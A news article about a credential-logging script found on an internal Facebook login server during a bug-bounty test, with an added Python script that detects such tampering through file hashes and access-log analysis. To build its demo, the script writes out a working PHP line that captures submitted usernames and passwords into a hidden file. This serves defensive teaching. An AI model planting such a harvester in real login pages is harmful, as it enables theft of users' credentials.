Facebook hacker finds leak containing employees’ usernames and passwords


An intruder had access to a server on Facebook’s internal network for months and logged the usernames and passwords of hundreds of employees.

The intrusion was uncovered by Taiwanese security researcher Orange Tsai, who was carrying out penetration testing to find bugs and try to break into Facebook’s internal corporate network.

Ethical or ‘whitehat’ hackers often carry out this type of testing to find bugs and check the security of a website. Tsai’s testing was carried out as part of the company’s Bug Bounty program, under which Facebook pays hackers who discover vulnerabilities in its systems and disclose them responsibly via its site.

During testing, Tsai discovered a malicious script planted on an internal login page, designed to capture the login details of Facebook staff.

Tsai found evidence that the server had first been compromised in July 2015, then again in September, and most recently in February 2016.

“While collecting vulnerability details and evidence for reporting to Facebook, I found some strange things in the web log.”

“The hacker created a proxy on the credential page to log the credentials of Facebook employees. These logged passwords were stored under the web directory for the hacker to use every once in a while,” Tsai said.
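The technique Tsai describes leaves two traces a defender can look for: the login page itself no longer matches the deployed version, and the dump file under the web root is fetched again and again by the same client. The script below is an added illustration of both checks, not Facebook’s tooling or Orange Tsai’s code. It builds a constructed web root, hashes it while clean, tampers with it the way the quote describes, and then runs a file-integrity diff plus a scan of constructed access-log lines; the paths, IPs and file names are invented for the example.

```python
import hashlib
import os
import re
import shutil
import tempfile
from collections import Counter

# Apache/nginx "combined" log format; only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample: normal staff logins plus one external client pulling
# the same unknown file from the login directory once a week.
SAMPLE_LOG = [
    '10.0.0.5 - - [05/Feb/2016:10:12:01 +0000] "GET /login/ HTTP/1.1" 200 2311 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [05/Feb/2016:10:12:03 +0000] "POST /login/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Feb/2016:11:00:00 +0000] "GET /login/.s.txt HTTP/1.1" 200 5123 "-" "curl/7.47"',
    '10.0.0.9 - - [06/Feb/2016:09:30:00 +0000] "GET /login/style.css HTTP/1.1" 200 800 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Feb/2016:11:00:00 +0000] "GET /login/.s.txt HTTP/1.1" 200 9876 "-" "curl/7.47"',
    '203.0.113.7 - - [19/Feb/2016:11:00:00 +0000] "GET /login/.s.txt HTTP/1.1" 200 14000 "-" "curl/7.47"',
    '10.0.0.9 - - [19/Feb/2016:12:00:00 +0000] "GET /login/missing.png HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map every file under root (relative, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            digests[rel] = sha256_file(full)
    return digests


def integrity_diff(expected, actual):
    """Compare a known-good manifest with the live tree.
    Returns (added, modified, missing), each a sorted list of paths."""
    added = sorted(p for p in actual if p not in expected)
    missing = sorted(p for p in expected if p not in actual)
    modified = sorted(p for p in expected if p in actual and expected[p] != actual[p])
    return added, modified, missing


def parse_log_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def suspicious_fetches(lines, served_paths, min_hits=2):
    """Successful GETs of paths that are not part of the deployed site.
    A credential dump collected 'every once in a while' shows up as the same
    client pulling the same unknown path repeatedly.
    Returns {(ip, path): count} for pairs seen at least min_hits times."""
    hits = Counter()
    for line in lines:
        rec = parse_log_line(line)
        if rec is None or rec["method"] != "GET" or rec["status"] != 200:
            continue
        if rec["path"] not in served_paths:
            hits[(rec["ip"], rec["path"])] += 1
    return {k: v for k, v in hits.items() if v >= min_hits}


def build_demo_tree():
    """Constructed web root: hashed while clean, then tampered with the way
    the incident describes (login page wrapped to log credentials, dump file
    left under the web directory). Returns (root, clean_manifest)."""
    root = tempfile.mkdtemp()
    login = os.path.join(root, "login")
    os.makedirs(login)
    clean = {
        "index.php": "<?php include 'auth.php'; render_login_form();\n",
        "style.css": "form { width: 20em; }\n",
    }
    for name, body in clean.items():
        with open(os.path.join(login, name), "w") as f:
            f.write(body)
    manifest = hash_tree(root)  # snapshot taken when the site was known-good
    # Attacker wraps the real handler and appends every submitted credential.
    with open(os.path.join(login, "index.php"), "w") as f:
        f.write("<?php file_put_contents('.s.txt', $_POST['user'] . ':' . $_POST['pass'] . PHP_EOL, FILE_APPEND);\n"
                "include 'auth.php'; render_login_form();\n")
    with open(os.path.join(login, ".s.txt"), "w") as f:
        f.write("alice:hunter2\n")
    return root, manifest


def run_checks():
    """Run both checks against the constructed tree and log; returns
    (added, modified, missing, suspicious_fetches)."""
    root, manifest = build_demo_tree()
    try:
        added, modified, missing = integrity_diff(manifest, hash_tree(root))
    finally:
        shutil.rmtree(root)
    served = {"/" + p for p in manifest} | {"/login/"}
    return added, modified, missing, suspicious_fetches(SAMPLE_LOG, served)


if __name__ == "__main__":
    print(run_checks())
```

Run on its own, the script reports `login/.s.txt` as an added file, `login/index.php` as modified, and the external client fetching `/login/.s.txt` three times; the 404 for a missing image is ignored because a harvester that returns nothing is not the pattern being hunted. On a real host the manifest would come from the deployment artifact rather than from the live server, since a server that has already been tampered with cannot vouch for itself.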

Tsai said the captured credentials could have given an attacker access to staff email, the VPN and internal file-transfer tools.

Tsai discovered the breach on February 5 and alerted Facebook. An internal investigation followed and concluded on April 20, after which details of the hack were published.

Tsai was reportedly paid a $10,000 bounty by Facebook for discovering and reporting the intrusion.

In a statement, Reginaldo, a member of Facebook’s security team, said: “We’re really glad Orange reported this to us.”

Reginaldo added that the activity Tsai had uncovered was the result of testing by another whitehat hacker taking part in Facebook’s bounty program.

“After incident response, we determined that the activity Orange detected was in fact from another researcher who participates in our bounty program. Neither of them was able to compromise other parts of our infrastructure so, the way we see it, it’s a double win: two competent researchers assessed the system, one of them reported what he found to us and got a good bounty, neither of them was able to escalate access.”
